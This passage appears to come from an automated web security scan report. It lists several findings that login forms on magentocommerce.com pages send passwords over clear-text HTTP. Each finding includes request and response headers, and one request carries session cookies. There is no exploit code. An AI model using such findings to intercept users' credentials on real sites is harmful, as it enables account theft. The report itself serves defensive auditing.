<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.69. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/stella-lena-ny/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/interviews/stella-lena-ny/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175974; expires=Sat, 11-Aug-2012 15:06:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Fstella-lena-ny%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:15 GMT
Content-Length: 39153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.70. http://www.magentocommerce.com/media/interviews/timeout-online/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/timeout-online/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/interviews/timeout-online/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175938; expires=Sat, 11-Aug-2012 15:05:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Ftimeout-online%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:39 GMT
Content-Length: 37701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.71. http://www.magentocommerce.com/media/interviews/tvonics/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/tvonics/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/interviews/tvonics/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175896; expires=Sat, 11-Aug-2012 15:04:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Ftvonics%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:56 GMT
Content-Length: 41632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.72. http://www.magentocommerce.com/media/interviews/wander/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wander/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/interviews/wander/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175967; expires=Sat, 11-Aug-2012 15:06:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fmedia%2Finterviews%2Fwander%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 40360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.73. http://www.magentocommerce.com/media/interviews/wearport/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wearport/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/interviews/wearport/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175899; expires=Sat, 11-Aug-2012 15:04:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fwearport%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:59 GMT
Content-Length: 38889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.74. http://www.magentocommerce.com/media/interviews/wkf-communications/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/wkf-communications/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/interviews/wkf-communications/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175909; expires=Sat, 11-Aug-2012 15:05:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fwkf-communications%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:09 GMT
Content-Length: 39057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.75. http://www.magentocommerce.com/media/screencasts

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/screencasts HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/interviews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170908; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.4.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171069; expires=Sat, 11-Aug-2012 13:44:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:29 GMT
Content-Length: 115374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.76. http://www.magentocommerce.com/media/screencasts/adding-related-products/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/adding-related-products/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/screencasts/adding-related-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176075; expires=Sat, 11-Aug-2012 15:07:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fadding-related-products%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:55 GMT
Content-Length: 33267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.77. http://www.magentocommerce.com/media/screencasts/community-groups/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/screencasts/community-groups/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176027; expires=Sat, 11-Aug-2012 15:07:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fcommunity-groups%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:07 GMT
Content-Length: 33275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.78. http://www.magentocommerce.com/media/screencasts/configurable-products/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/screencasts/configurable-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176088; expires=Sat, 11-Aug-2012 15:08:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fmedia%2Fscreencasts%2Fconfigurable-products%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:08 GMT
Content-Length: 35258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.79. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configuring-tier-pricing/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/screencasts/configuring-tier-pricing/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176151; expires=Sat, 11-Aug-2012 15:09:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Fscreencasts%2Fconfiguring-tier-pricing%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:11 GMT
Content-Length: 34931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.80. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/content-staging-and-merging/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field: login[password]

Request

GET /media/screencasts/content-staging-and-merging/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176016; expires=Sat, 11-Aug-2012 15:06:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fmedia%2Fscreencasts%2Fcontent-staging-and-merging%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:56 GMT
Content-Length: 33289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.81. http://www.magentocommerce.com/media/screencasts/currency/view

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/currency/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.magentocommerce.com/products/customer/account/loginPost/

The form contains the following password field:

login[password]

Request

GET /media/screencasts/currency/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
